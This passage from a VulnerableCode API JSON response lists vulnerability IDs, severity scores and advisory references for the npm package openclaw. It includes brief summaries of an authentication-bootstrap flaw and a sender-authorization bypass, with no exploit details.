g2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-31999","GHSA-6f6j-wx9w-ff4j"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9nq6-ujfu-4ycx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50468?format=json","vulnerability_id":"VCID-a54z-trcv-p3b8","summary":"OpenClaw: Browser control startup could continue unauthenticated after auth bootstrap failure\nWhen browser control started without explicit auth credentials, OpenClaw attempted to bootstrap auth automatically. In affected versions, if that bootstrap step threw an error, startup could continue and expose browser-control routes without authentication.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32041","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06538","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06549","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0655","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32041"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-browser-control-access-via-failed-auth-bootstrap","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-20T17:51:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-browser-control-access-via-failed-auth-bootstrap"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32041","reference_id":"CVE-2026-32041","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32041"},{"reference_url":"https://github.com/advisories/GHSA-vpj2-69hf-rppw","reference_id":"GHSA-vpj2-69hf-rppw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vpj2-69hf-rppw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vpj2-69hf-rppw","reference_id":"GHSA-vpj2-69hf-rppw","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-20T17:51:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vpj2-69hf-rppw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-32041","GHSA-vpj2-69hf-rppw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a54z-trcv-p3b8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50477?format=json","vulnerability_id":"VCID-h6ka-w3qr-yuhe","summary":"OpenClaw has an unauthorized sender bypass in its stop triggers and /models command authorization\nUnauthorized senders could trigger two command paths without sender authorization checks:\n1. stop-like natural-language abort triggers\n2. `/models` command output","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-8m9v-xpgf-g99m","reference_id":"GHSA-8m9v-xpgf-g99m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8m9v-xpgf-g99m"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8m9v-xpgf-g99m","reference_id":"GHSA-8m9v-xpgf-g99m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8m9v-xpgf-g99m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21